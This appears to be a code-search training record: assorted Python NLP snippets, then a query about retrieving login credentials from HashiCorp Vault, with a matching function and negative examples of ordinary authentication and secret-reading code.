"def analyseHeadlineSentiment(self, for_topics):\n\n if (for_topics):\n model = self.topic_model\n else:\n model = self.party_model\n\n headline = self.headline\n headline_polarity = TextBlob(headline).sentiment.polarity\n\n # Find the most likely topic of the headline\n headline_vectorized = self.getVectorised(headline)\n topic_binary_predictions = model.predict(headline_vectorized)\n topic_probabilities = model.predict_proba(headline_vectorized)[0][0]\n\n likely_topics = np.nonzero(topic_binary_predictions == True)[1]\n topic_probabilities = dict([(topic_index, round(topic_probabilities[topic_index], 1)) for topic_index in range(0, len(topic_probabilities)) if topic_index in likely_topics])\n\n # key = topic index, value = [sentiment score, counter (for averages)]\n headline_topics_matrix = {}\n\n for likely_topic in likely_topics:\n if (likely_topic != 0): # Ignore the junk topic\n if (likely_topic not in headline_topics_matrix):\n headline_topics_matrix[likely_topic] = 0\n\n weighted_polarity = headline_polarity * topic_probabilities[likely_topic]\n headline_topics_matrix[likely_topic] += weighted_polarity\n\n # Then, look for political people (entities)\n if (not for_topics):\n\n # Change to lower-case and strip accents\n preprocessed_headline = self.preprocessor.changeToLower(headline)\n preprocessed_headline = self.preprocessor.stripAccents(headline)\n\n # Check the entity tracker first, if we've already seen an MP previously\n for full_name, name_split in self.entity_tracker.items():\n search_forename = re.search(rf\".*{name_split[0]}.*\", preprocessed_headline, re.IGNORECASE)\n search_surname = re.search(rf\".*{name_split[1]}.*\", preprocessed_headline, re.IGNORECASE)\n search_full = re.search(rf\".*{full_name}.*\", preprocessed_headline, re.IGNORECASE)\n\n if ((search_forename or search_surname) and not search_full): # If either parts of the name appear (but not together)\n party_num = name_split[2]\n party_num = int(party_num)\n if (party_num not in headline_topics_matrix):\n headline_topics_matrix[party_num] = 0\n\n headline_topics_matrix[party_num] += headline_polarity\n\n\n # If the sentence contains an MP from a political party, get sentiment \n for mp_name, party_num in self.mps.items():\n party_num = int(party_num)\n search = re.search(rf\".*{mp_name}.*\", preprocessed_headline, re.IGNORECASE)\n if (search):\n if (party_num not in headline_topics_matrix):\n headline_topics_matrix[party_num] = 0\n\n headline_topics_matrix[party_num] += headline_polarity\n \n # Separate first and last name for advanced entity searching in future sentences in paragraph\n if (mp_name not in self.entity_tracker):\n self.entity_tracker[mp_name] = [mp_name.split(\" \")[0], mp_name.split(\" \")[1], party_num]\n\n # Bound\n for topic, score in headline_topics_matrix.items():\n if (score > 1):\n headline_topics_matrix[topic] = 1\n elif (score < -1):\n headline_topics_matrix[topic] = -1\n\n return headline_topics_matrix",
"def printsection(heading,optdict,typedict):\n from forcebalance.objective import Implemented_Targets\n from forcebalance.optimizer import Optimizer\n\n def FilterTargets(search):\n if type(search) == str:\n search = [search]\n list_out = []\n for key in sorted(Implemented_Targets.keys()):\n if any([i.lower() in key.lower() for i in search]):\n list_out.append(Implemented_Targets[key].__name__)\n return ', '.join(sorted(list_out))\n\n Answer = [heading]\n firstentry = 1\n Options = []\n for i in ['strings','allcaps','lists','ints','bools','floats','sections']:\n vartype = re.sub('s$','',i)\n for j in typedict[i]:\n Option = []\n val = optdict[j] if optdict is not None else typedict[i][j][0]\n if firstentry:\n firstentry = 0\n else:\n Option.append(\"\")\n Priority = typedict[i][j][1]\n Option.append(\"# (%s) %s\" % (vartype, typedict[i][j][2]))\n if len(typedict[i][j]) >= 4:\n Relevance = typedict[i][j][3]\n str2 = \"# used in: %s\" % Relevance\n if len(typedict[i][j]) >= 5:\n TargetName = FilterTargets(typedict[i][j][4])\n str2 += \" (%s)\" % TargetName\n else:\n TargetName = \"None\"\n Option.append(str2)\n else:\n Relevance = \"None\"\n Option.append(\"%s %s\" % (str(j),str(val)))\n Options.append((Option, Priority, TargetName, j))\n def key1(o):\n return o[1]\n def key2(o):\n return o[2]\n def key3(o):\n return o[3]\n Options.sort(key=key3)\n Options.sort(key=key2)\n Options.sort(key=key1, reverse=True)\n for o in Options:\n Answer += o[0]\n\n # PriSet = sorted(list(set(Priorities)))[::-1]\n # TgtSet = sorted(list(set(TargetNames)))\n # RelSet = sorted(list(set(Relevances)))\n # for p0 in PriSet:\n # ogrp = []\n # rgrp = []\n # tgrp = []\n # for o, p, r, t in zip(Options, Priorities, Relevances, TargetNames):\n # if p == p0:\n # ogrp.append(o)\n # rgrp.append(r)\n # tgrp.append(t)\n # ogrp2 = []\n # rgrp2 = []\n # for t0 in TgtSet:\n # for o, r, t in zip(ogrp, rgrp, tgrp):\n # if t == t0:\n # ogrp2.append(\n\n Answer.append(\"$end\")\n return Answer",
"def overall_feeling(mood):\n \n # Quote and parting words of advice for students based on \n # what mood they have chosen to be currently feeling, from:\n # happy, sad, frustrated, bored, overwhelmed, hopeful, excited,\n # relaxed, hungry, and silly.\n mood_happy = (\" \\n *** 'Create the highest, grandest vision possible for\" +\n \" your life, because you become what you believe.'\" +\n \" -Oprah Winfrey. \\n Never take your happiness for\" +\n \" granted. :D U r pawsome! *** \\n \")\n mood_sad = (\" \\n *** 'There are only two ways to live your life. One is\" +\n \" as though nothing is a miracle. The other is as though\" +\n \" everything is a miracle.' -Albert Einstein \\n When I\" +\n \" am sad, I ask hooman to play fetch with me. However,\" +\n \" I don't think know how effective that is for you.\" +\n \" Sadness is really a tough one, there are just so many\" +\n \" angles to it... if only I could make you feel better\" +\n \" with just one quote. This too shall pass, my\" +\n \" fur-end! *** \\n \")\n mood_frustrated = (\" \\n *** 'If you can't fly, then run, if you can't\" +\n \" run, then walk, if you can't walk, then crawl,\" +\n \" but whatever you do, you have to keep moving\" \n \" forward.' -Martin Luther King Jr. \\n\" +\n \" Frustration is extremely stressful, but keep\" +\n \" going! No need to terrier-self up about it.\" +\n \" The end is near! Soon you will find peace of\" +\n \" mind. I'm rooting for you! *** \\n \")\n mood_bored = (\" \\n *** 'The time is always right to do what is right.'\" + \n \" -Martin Luther King Jr. \\n Go out and get some\" +\n \" fresh air! Or take this time to educate yourself\" +\n \" on current worldwide issues. This is a perfect\" +\n \" op-paw-tunity! There is no such thing as being\" +\n \" overeducated! :D *** \\n \")\n mood_overwhelmed = (\" \\n *** Believe you can and you're halfway there.'\" +\n \" -Theodore Roosevelt \\n Don't stress\" +\n \" yourself out, Puppy believes in you! You have\" +\n \" so much pet-tential! :D *** \\n \")\n mood_hopeful = (\" \\n *** ' All of our dreams can come true if we have\" +\n \" the courage to pursue them.' -Walt Disney \\n\" +\n \" Anything is paw-sible! :-) *** \\n \")\n mood_excited = (\" \\n *** 'You're only given a little spark of madness.\" +\n \" You mustn't lose it.' -Robin Williams \\n Looks like\" +\n \" fun things are happening in your life! Must be\" +\n \" having the ulti-mutt time of your life!! :D *** \\n \")\n mood_relaxed = (\" \\n *** 'Rest and be thankful.' -William Wadsworth \\n\" +\n \" Good for you! Hope you live long and paws-per! :)\" +\n \" *** \\n \")\n mood_hungry = (\" \\n *** I see that you're hungry. I am always hungry, but\" +\n \" my hooman only feeds me three times a day. How\" +\n \" prepawsterous! I hope you realize you are lucky to\" +\n \" have such long legs and arms to walk to the fridge\" +\n \" and grab yourself some food! Might I recommend\" +\n \" pup-eroni pizza...? *** \\n \")\n mood_silly = (\" \\n *** 'Why did the man fall into the well? He couldn't\" +\n \" see that well!' \\n If you're feeling silly, you\" +\n \" probably like puns. Hope you got a good chuckle out\" +\n \" of that one! I thought it was howlarious! 
:D *** \\n \")\n \n # Based on what mood the student feels, will return the corresponding\n # statement through if statements.\n if mood == 'happy':\n return(mood_happy)\n elif mood == 'sad':\n return(mood_sad)\n elif mood == 'frustrated':\n return(mood_sad)\n elif mood == 'bored':\n return(mood_bored)\n elif mood == 'overwhelmed':\n return(mood_overwhelmed)\n elif mood == 'hopeful':\n return(mood_hopeful)\n elif mood == 'excited':\n return(mood_excited)\n elif mood == 'relaxed':\n return(mood_relaxed)\n elif mood == 'hungry':\n return(mood_hungry)\n elif mood == 'silly':\n return(mood_silly)",
"def normalize(paraphrase):\n paraphrase = paraphrase.replace('[w1]', 'something').replace('[w2]', 'Thing') # For better parsing\n paraphrase_tokens = [t for t in nlp(paraphrase)]\n\n # Remove the NOUN/ADJ/DET in: [w2] ADP NOUN/ADJ/DET [w1]\n if paraphrase_tokens[-1].orth_ == 'something' and \\\n (paraphrase_tokens[-2].pos in set([NOUN, ADJ, DET]) or paraphrase_tokens[-2].orth_ == 'her'):\n paraphrase_tokens = paraphrase_tokens[:-2] + [paraphrase_tokens[-1]]\n\n # Remove adjectives and adverbs, and specific determiners (but not which, that)\n paraphrase_tokens = [t for t in paraphrase_tokens\n if t.pos not in tags_to_remove and \\\n t.orth_ not in modals and \\\n (t.pos != DET or t.orth_ in good_determiners)]\n\n # Named entities (e.g. \"price of rice in India\")\n if any([t.pos == PROPN for t in paraphrase_tokens]):\n return None\n\n # Replace past tense be verbs\n paraphrase_words = [t.orth_ if t.orth_ not in be_inflections else 'is'\n for t in paraphrase_tokens]\n\n # Last word is \"who\"\n if paraphrase_words[-1] == 'who':\n paraphrase_words = paraphrase_words[:-1]\n\n paraphrase = ' '.join(paraphrase_words).replace('something', '[w1]').replace('Thing', '[w2]')\n\n # Out-of-context\n if paraphrase == '[w2] is [w1]' or paraphrase == '[w2] as [w1]':\n return None\n\n if len(paraphrase) >= 2 and '[w2] [w1]' not in paraphrase:\n return paraphrase\n\n return None",
"def hat_rules(self, prob_function, args = [], labels = {}):\n\t\t#maybe change this to variable number of args with *args\n\t\t# Create nodes for all positions between words\n\t\troot_span = (0,self.lengthS)\n\t\tself.root_label = labels.get(root_span,None)\n\t\tnodes = [Node(i) for i in xrange(0, self.lengthS + 1)]\n\t\tspans = []\n\t\t\n\t\t# Construct the graph by creating the edges\n\t\tfor (i,j) in self.spans():\n\t\t\tnodes[j].link_to(nodes[i])\n\t\t\tspans.append((i,j))\n\t\tfor (i,j) in spans:\n\t\t\tfor path in nodes[i].shortest_paths_to(nodes[j]):\n\t\t\t\tif not path or len(path) == 2:\n\t\t\t\t\t# No rule possible, or path points to itself\n\t\t\t\t\tcontinue\n\t\t\t\trule = Rule((i,j),path, labels)\n\t\t\t\t# set probability\n\t\t\t\tprob = prob_function(rule,args)\n\t\t\t\tyield self.prune_production(rule, self.lex_dict)",
"def find_cooking_methods(steps, knowledge_base):\n verbiage = knowledge_base.cooking_terms\n method_list = []\n for step in steps:\n step = step.lower()\n for method in verbiage:\n if method in step and method not in method_list:\n step = step.replace(method, '')\n method_list.append(method)\n # print method_list\n return method_list",
"def test_joining_words_line_ending_evaluator(self):\n join_evaluator = JoiningWordLineEndingEvaluator()\n \n #comment with 2 lines that end in noun/verbs\n text = HaikuText(text=\"An old silent pond... A frog jumps into the pond. Splash! Silence again.\")\n haiku = text.get_haiku()\n #should score 66 \n self.assertEqual(join_evaluator(haiku), 100)\n\n # 2 good lines, one ending in is\n text.set_text(\"Application and the most wonderful artist that man can show us\")\n haiku = text.get_haiku()\n #should score 66\n self.assertEqual(join_evaluator(haiku), 2*100/3) \n \n #No verbs/nouns at line ends,\n text.set_text(\"They jumped right on in the boat is never sunk and that man can show of\")\n haiku = text.get_haiku()\n \n self.assertEqual(join_evaluator(haiku), 0)",
"def translation_paraphrase_evaluation(sources, hypos, refs, sentence_preproce_function=None, print_scores=True, max_n=4, rouge_alpha=0.5, rouge_weight_factor=1.2, rouge_stemming=True, hypo_style='first'):\n assert(isinstance(sources, list))\n assert(isinstance(sources[0], str))\n assert(isinstance(hypos, list))\n assert(isinstance(hypos[0], list))\n assert(isinstance(hypos[0][0], str))\n assert(isinstance(refs, list))\n assert(isinstance(refs[0], list))\n assert(isinstance(refs[0][0], str))\n \n if hypo_style == 'first':\n hypos = [hypo[0] for hypo in hypos]\n else:\n raise NotImplementedError\n\n # apply sentence_preproce_function, e.g. remove_tokens\n if sentence_preproce_function is not None:\n sources = [sentence_preproce_function(source) for source in sources]\n if hypo_style == 'first':\n hypos = [sentence_preproce_function(hypo) for hypo in hypos]\n else:\n raise NotImplementedError\n hypos = [[sentence_preproce_function(hypo) for hypo in hypo_list] for hypo_list in hypos]\n refs = [[sentence_preproce_function(ref) for ref in refs_list] for refs_list in refs]\n\n\n sources_refs = [[sentence] for sentence in sources] # we use source as the reference to compute a negative score, in order to measure the diversity of paraphrasing.\n metrics_dict = {}\n\n for aggregator in ['Avg', 'Best']:\n apply_avg = aggregator == 'Avg'\n apply_best = aggregator == 'Best'\n\n evaluator = rouge.Rouge(metrics=['rouge-n', 'rouge-l', 'rouge-w'],\n max_n=max_n,\n apply_avg=apply_avg,\n apply_best=apply_best,\n alpha=rouge_alpha, # Default F1_score\n weight_factor=rouge_weight_factor,\n stemming=rouge_stemming)\n \n compare_dict = {'hypos':hypos, 'sources':sources, 'sources_refs_diversity_negative': hypos}\n for key in compare_dict:\n if key == 'sources_refs_diversity_negative':\n scores = evaluator.get_scores(compare_dict[key], sources_refs)\n else:\n scores = evaluator.get_scores(compare_dict[key], refs)\n metrics_dict[key+'_rouge_'+aggregator] = scores\n\n if print_scores:\n print('Evaluation with {} with {}'.format(key, aggregator))\n for metric, results in sorted(scores.items(), key=lambda x: x[0]):\n if not apply_avg and not apply_best: # value is a type of list as we evaluate each summary vs each reference\n for hypothesis_id, results_per_ref in enumerate(results):\n nb_references = len(results_per_ref['p'])\n for reference_id in range(nb_references):\n print('\\tHypothesis #{} & Reference #{}: '.format(hypothesis_id, reference_id))\n print('\\t' + rouge_helper_prepare_results(metric,results_per_ref['p'][reference_id], results_per_ref['r'][reference_id], results_per_ref['f'][reference_id]))\n print()\n else:\n print(rouge_helper_prepare_results(metric, results['p'], results['r'], results['f']))\n print()\n\n bleu_sources = []\n for source in sources:\n bleu_sources.append(word_tokenize(source))\n bleu_hypos = []\n if hypo_style == 'first':\n for hypo in hypos:\n bleu_hypos.append(word_tokenize(hypo))\n else:\n raise NotImplementedError\n bleu_hypos = copy.deepcopy(hypos)\n for sub_hypo in bleu_hypos:\n for i in range(len(sub_hypo)):\n sub_hypo[i] = word_tokenize(sub_hypo[i])\n bleu_refs = copy.deepcopy(refs)\n for sub_ref in bleu_refs:\n for i in range(len(sub_ref)):\n sub_ref[i] = word_tokenize(sub_ref[i])\n for sources_ref in sources_refs:\n for i in range(len(sources_ref)):\n sources_ref[i] = word_tokenize(sources_ref[i])\n\n\n\n # print(corpus_bleu(bleu_refs, bleu_hypos, weights=(1, 0, 0, 0)))\n # return\n metrics_dict[\"bleu_1\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(1, 0, 0, 0))\n 
metrics_dict[\"bleu_2\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"bleu_3\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"bleu_4\"] = corpus_bleu(bleu_refs, bleu_hypos, weights=(0.25, 0.25, 0.25, 0.25))\n\n metrics_dict[\"source_sentence_bleu_1\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(1, 0, 0, 0))\n metrics_dict[\"source_sentence_bleu_2\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"source_sentence_bleu_3\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"source_sentence_bleu_4\"] = corpus_bleu(bleu_refs, bleu_sources, weights=(0.25, 0.25, 0.25, 0.25))\n\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_1\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(1, 0, 0, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_2\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.5, 0.5, 0, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_3\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.33, 0.33, 0.34, 0))\n metrics_dict[\"sources_as_refs_diversity_negative_bleu_4\"] = corpus_bleu(sources_refs, bleu_hypos, weights=(0.25, 0.25, 0.25, 0.25))\n\n if print_scores:\n for sc in [\"bleu_1\", \"bleu_2\", \"bleu_3\", \"bleu_4\", \"source_sentence_bleu_1\", \"source_sentence_bleu_2\", \"source_sentence_bleu_3\", \"source_sentence_bleu_4\", \"sources_as_refs_diversity_negative_bleu_1\", \"sources_as_refs_diversity_negative_bleu_2\", \"sources_as_refs_diversity_negative_bleu_3\", \"sources_as_refs_diversity_negative_bleu_4\"]:\n print(sc,\"(percents):\", round(metrics_dict[sc], 4) * 100)\n\n return metrics_dict",
"def body_words_in_headline(self,doc):\n features = defaultdict(int)\n analyze = self.build_analyzer()\n headline_tokens=analyze(doc[0])\n body_tokens=analyze(doc[1])\n #headline_token_counts=defaultdict(int)\n body_token_counts=defaultdict(int)\n for token in body_tokens:\n body_token_counts[token]+=1\n for token in headline_tokens:\n if token in body_token_counts:\n features[token] +=1\n return features",
"def add_scores(self, hyp):\n # Collect up the phrase pairs\n phrases = []\n source_tokens = hyp.input_line.split()\n tgt_st = 0\n if not hyp.alignment:\n raise DataFormatException(\"Alignments missing from: \" + str(hyp))\n for src_st,src_end,tgt_end in hyp.alignment:\n phrases.append((source_tokens[src_st:src_end], hyp.tokens[tgt_st:tgt_end]))\n tgt_st = tgt_end\n # Look up the scores\n phrase_scores = []\n for ttable in self.ttables:\n phrase_scores.append([])\n for phrase in phrases:\n phrase_scores[-1].append(ttable.get_scores(phrase))\n# phrase_scores = np.array(phrase_scores)\n# eps = np.exp(-100)\n# phrase_scores[phrase_scores<eps]=eps\n floor = np.exp(-100)\n phrase_scores = np.clip(np.array(phrase_scores), floor, np.inf)\n hyp.phrase_scores = phrase_scores",
"def apply_nlp(category):\n if \" \" in category:\n if \" for \" in category:\n idx = category.find(\" for \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 5 :])\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \"(\" in category:\n start = category.find(\"(\")\n end = category.find(\")\")\n outer = strip_article(category[:start] + \" \" + category[end + 1 :])\n inner = strip_article(category[start + 1 : end])\n return [outer, inner, *apply_nlp(outer), *apply_nlp(inner)]\n elif \" with \" in category:\n idx = category.find(\" with \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 6 :])\n return [prefix, suffix, *apply_nlp(prefix), *apply_nlp(suffix)]\n elif \" of \" in category:\n idx = category.find(\" of \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 4 :])\n if prefix in [\"pair\", \"copy\", \"base\", \"fragments\", \"figure\", \"copy\"]:\n return [suffix, *apply_nlp(suffix)]\n else:\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \" from \" in category:\n idx = category.find(\" from \")\n prefix = strip_article(category[:idx])\n suffix = strip_article(category[idx + 4 :])\n if prefix in [\"pair\", \"copy\", \"base\", \"fragments\", \"figure\", \"copy\"]:\n return [suffix, *apply_nlp(suffix)]\n else:\n return [suffix, prefix, *apply_nlp(suffix), *apply_nlp(prefix)]\n elif \"&\" in category:\n categories = [strip_article(c) for c in category.split(\"&\")]\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n elif \" and \" in category or \",\" in category:\n categories = []\n while \" and \" in category or \",\" in category:\n and_idx = category.find(\" and \")\n comma_idx = category.find(\",\")\n if and_idx >= 0 and comma_idx >= 0:\n idx = min(and_idx, comma_idx)\n elif and_idx >= 0:\n idx = and_idx\n elif comma_idx >= 0:\n idx = comma_idx\n else:\n idx = -1\n if idx >= 0:\n categories.append(strip_article(category[:idx]))\n if category[idx] == \",\":\n category = category[idx + 1 :]\n else:\n category = category[idx + 5 :]\n if category.strip().strip(\"()[]\"):\n categories.append(strip_article(category.strip().strip(\"()[]\")))\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n elif \" or \" in category:\n categories = []\n while \" or \" in category:\n idx = category.find(\" or \")\n if idx >= 0:\n categories.append(strip_article(category[:idx]))\n category = category[idx + 4 :].strip().strip(\"()[]\")\n if category.strip().strip(\"()[]\"):\n categories.append(strip_article(category))\n for cat in list(categories):\n categories = categories + apply_nlp(cat)\n return categories\n else:\n categories = category.split()\n return [\" \".join(categories[-idx:]) for idx in range(len(categories) - 1, 0, -1)]\n else:\n return []",
"def generate_hairstyle(hairstyle_attributes, is_male):\n\n hair_type = {\"Bald\", \"Straight_Hair\", \"Wavy_Hair\", \"Receding_Hairline\"}\n\n # To create grammatically correct order of description\n arranged_attributes = []\n colours = list(set(hairstyle_attributes) - hair_type)\n if len(colours) > 1:\n # Combines two colours into one attribute\n colour = \"\"\n for i, _colour in enumerate(colours):\n if i == 0:\n _colour = _colour.lower().split(\"_\")[0] + \"ish\"\n _colour = _colour.lower().split(\"_\")[0]\n colour += _colour + \" \"\n arranged_attributes.append(\n colour.strip()\n ) # Strip to remove trailing whitespace\n elif len(colours) == 1:\n colour = colours[0].lower().split(\"_\")[0]\n arranged_attributes.append(colour)\n style = set(hairstyle_attributes) & {\"Straight_Hair\", \"Wavy_Hair\"}\n arranged_attributes.extend(list(style))\n bald_rec = set(hairstyle_attributes) & {\"Receding_Hairline\", \"Bald\"}\n arranged_attributes.extend(list(bald_rec))\n\n if len(arranged_attributes) == 1:\n attribute = arranged_attributes[0].lower().split(\"_\")[0]\n if attribute == \"bald\":\n return \"He is bald.\" if is_male else \"She is bald.\"\n if random.random() <= 0.5:\n sentence = \"His\" if is_male else \"Her\"\n return sentence + \" hair is \" + attribute + \".\"\n else:\n sentence = \"He\" if is_male else \"She\"\n return sentence + \" has \" + attribute + \" hair.\"\n\n # Adding variation in sentence structure\n if random.random() <= 0.5:\n sentence = \"His\" if is_male else \"Her\"\n sentence += \" hair is\"\n for i, attribute in enumerate(arranged_attributes):\n attribute = attribute.lower().split(\"_\")[0]\n if len(arranged_attributes) - 1 == i:\n sentence = sentence[:-1]\n if attribute == \"bald\":\n attribute = \"he\" if is_male else \"she\"\n attribute += (\n \" is \" + random.choice([\"going\", \"partially\"]) + \" bald\"\n )\n return sentence + \" and \" + attribute + \".\"\n return sentence + \" and \" + attribute + \".\"\n sentence += \" \" + attribute + \",\"\n else:\n sentence = \"He\" if is_male else \"She\"\n sentence += \" has\"\n for i, attribute in enumerate(arranged_attributes):\n attribute = attribute.lower().split(\"_\")[0]\n if len(arranged_attributes) - 1 == i:\n sentence = sentence[:-1]\n if attribute == \"bald\":\n sentence += \" hair\"\n attribute = \"he\" if is_male else \"she\"\n attribute += (\n \" is \" + random.choice([\"going\", \"partially\"]) + \" bald\"\n )\n return sentence + \" and \" + attribute + \".\"\n return sentence + \" and \" + attribute + \" hair.\"\n sentence += \" \" + attribute + \",\"",
"def generateWHQuestion(self, sentence):\n # sentence = sentence.lower()\n question = ''; # question\n WHVerbs = ['Who', 'What', 'Where']; # wh verb list\n # p = PreProcess()\n # wordDic = {'But':'','Similarly':'','Thus':'','Therefore,':''}\n wordDic = {'Thus, ': '', 'Hence, ': '', 'Hence ': '', 'Therefore,': '', 'But,': '', 'But': '', 'Similarly': '',\n 'Therefore': ''} # word dictionary of conjunctions\n p = PreProcess()\n sentence = p.multipleReplace(sentence,\n wordDic) # replacing conjunctions in word dictionary if found in sentence\n helper = QuestionFormationHelper()\n # if nltk.word_tokenize(sentence)[0].find(\"But\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Therefore\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Similarly\") != -1 or nltk.word_tokenize(sentence)[0].find(\"Thus\") != -1:\n # sentence = p.multipleReplace(sentence,wordDic)\n sentence = helper.removingFirstDt(sentence) # removing the first determiner\n subject = helper.getSubject(sentence); # identifying the subject of the sentence\n\n if subject == 'SUBJECT CANNOT BE DEFINED' or subject == 'none':\n question = '';\n else:\n label = helper.getLabelArray(subject); # identifying the named entity label for the subject\n\n if label == '':\n # wordDict = {'%subject%': 'What '}\n # p = PreProcess()\n # question = p.multipleReplace(sentence,wordDict)\n # print(\"SUBJECT : \" + subject.lstrip())\n # when there is no particular label the question will be what type\n # print(\"SUBJECT::::::::::: \" + subject.lstrip())\n question = str(sentence).replace(subject.lstrip(), \"What \", 1);\n question = question + ' ?'\n # print(question)\n # question = question.replace(\".\", \"?\");\n # print(question)\n # when the named entity label is person the question will be who type\n elif label == 'PERSON':\n question = sentence.replace(subject, \"Who \", 1);\n question = question + ' ?'\n # when the named entity label is location the question will be where type\n elif label == 'LOCATION':\n question = sentence.replace(subject, \"Where \", 1);\n question = question + ' ?'\n\n\n if question is '':\n # question = \"CANNOT GENERATE MEANINGFUL WH TYPE QUESTION\";\n return '';\n elif nltk.word_tokenize(question)[0] not in WHVerbs:\n # question = \"CANNOT GENERATE MEANINGFUL WH TYPE QUESTION\";\n return '';\n else:\n return question"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Go to vault, get our login credentials and return a dict properly formatted for authenticating with the web site.
|
def get_login_credentials():
hvac_client = get_hvac_client()
login_credentials = hvac_client.secrets.kv.v1.read_secret(
VAULT_SECRETS_PATH
)
return login_credentials["data"]
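A brief usage sketch of how the returned dict might feed a login request, assuming the Vault secret already stores form-ready keys such as "username" and "password" and that the requests library is available; the login URL parameter and those key names are illustrative assumptions, not taken from the original.

import requests

def login_to_site(login_url):
    # Fetch the secret material from Vault and post it as the login form body.
    credentials = get_login_credentials()
    response = requests.post(login_url, data=credentials)
    response.raise_for_status()
    return response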
|
[
"def authenticate():\n\n if settings.user_login == 'read_only':\n log.error('Write access denied for read_only user.')\n sys.exit(1)\n else:\n log.info('Authenticating login: %s' % (settings.user_login))\n if settings.user_login == 'kaboom':\n password = 'password'\n elif settings.user_login == 'hvm':\n password = settings.hvm_password\n else:\n password = getpass.getpass('password: ')\n\n try:\n payload = {'form.submitted': True,\n 'api.client': True,\n 'return_url': '/api',\n 'login': settings.user_login,\n 'password': password\n }\n r = session.post(settings.api_protocol\n + '://'\n + settings.api_host\n + '/login', data=payload)\n\n if r.status_code == requests.codes.ok:\n\n cookies = session.cookies.get_dict()\n log.debug('Cookies are: %s' %(cookies))\n try:\n write_cookie(cookies)\n return cookies\n except Exception, e:\n log.error('Exception: %s' % e)\n\n else:\n log.error('Authentication failed')\n sys.exit(1)\n\n except Exception, e:\n log.error('Exception: %s' % e)\n log.error('Authentication failed')\n sys.exit(1)",
"def list_vaults():\n return json.loads(read_bash_return(\"op vault list --format=json\", single=False))",
"def get_login():\n return {\n 'server': os.environ.get(\"DERPY_SERVER\",\n \"https://crawl.kelbi.org/#lobby\"),\n 'username': os.environ.get(\"DERPY_USERNAME\", \"username\"),\n 'password': os.environ.get(\"DERPY_PASSWORD\", \"password\"),\n }",
"def _get_ansible_vault_password_and_record(self):\n self._get_vault_variables_and_record()\n return self._get_ansible_vault_password()",
"def _load_secrets_from_vault(\n password: str,\n vault_file: str\n) -> Dict[str, Union[str, Dict[str, str]]]:\n with py7zr.SevenZipFile(vault_file, mode='r', password=password) as f:\n archive = f.readall()\n d = json.load(archive['secrets.json'])\n return d",
"def login_to_bovada():\n\tquery_1 = query_login_endpoint() #query the login endpoint like we would if using a browser\n\tif query_1.status_code == 200:\n\t\tauthenticated_ourselves = bovada_auth()\n\t\tif authenticated_ourselves.status_code == 200:\n\t\t\treturn authenticated_ourselves\n\t\telse:\n\t\t\traise BovadaAuthenticationError(authenticated_ourselves.reason)\n\telse:\n\t\traise BovadaException(query_1.reason)",
"def read_from_vault(self, path_to_read, vault_client):\n self.logger.debug(\"Reading kv tree\")\n kv_full = {}\n kv_list = vault_client.secrets_tree_list(\n path_to_read\n )\n self.logger.debug(\"Secrets found: \" + str(kv_list))\n for kv in kv_list:\n kv_full[kv] = vault_client.read_secret(kv)\n return kv_full",
"def towerLogin(self, url, username, password):\n global PROXY_DICT\n login_data = (str(username), str(password))\n login_header = {'Content-Type': 'application/json'}\n try:\n response = requests.post(url, auth=login_data,\n headers=login_header, verify=False,\n timeout=5, proxies=PROXY_DICT)\n if response.status_code != 201:\n self.logger.warn('Tower Login failed...'\n '\\nStatus Code{0} - {1}'\n ''.format(response.status_code,\n response.text))\n exit(-1)\n else:\n return response.json()['token']\n except requests.exceptions.ConnectTimeout:\n self.logger.warning('ERROR: Error connecting to '\n 'Ansible host: connection attempt timed out.')\n exit(-1)",
"def read_from_vault(self, path_to_read):\n self.logger.debug(\"Reading kv tree\")\n vault_client = VaultClient(\n self.base_logger,\n dry=self.parsed_args.dry_run,\n skip_tls=self.parsed_args.skip_tls\n )\n vault_client.authenticate()\n kv_full = {}\n kv_list = vault_client.get_secrets_tree(\n path_to_read\n )\n self.logger.debug(\"Secrets found: \" + str(kv_list))\n for kv in kv_list:\n kv_full[kv] = vault_client.read_secret(kv)\n return kv_full",
"def serverReadAuthCreds(conn:socket.socket) ->tuple:\n version, ulen = struct.unpack(\"BB\", __class__.recv2(conn, 2, socket.MSG_WAITALL))\n username = __class__.recv2(conn, ulen, socket.MSG_WAITALL)\n plen = ord(__class__.recv2(conn, 1))\n password = __class__.recv2(conn, plen, socket.MSG_WAITALL)\n return (version, username.decode(\"utf-8\"), password.decode(\"utf-8\"))",
"def auth(self):\n return (self.username, self.password)",
"def extractCredentials(self, request):\n creds = {}\n getHeader = getattr(request, 'getHeader', None)\n if getHeader is None:\n # use get_header instead for Zope-2.8\n getHeader = request.get_header\n user_id = getHeader('REMOTE_USER')\n if user_id is not None:\n creds['machine_login'] = user_id\n creds['remote_host'] = request.get('REMOTE_HOST', '')\n try:\n creds['remote_address'] = request.getClientAddr()\n except AttributeError:\n creds['remote_address'] = request.get('REMOTE_ADDR', '')\n return creds\n else:\n # fallback to default way\n return DumbHTTPExtractor().extractCredentials(request)",
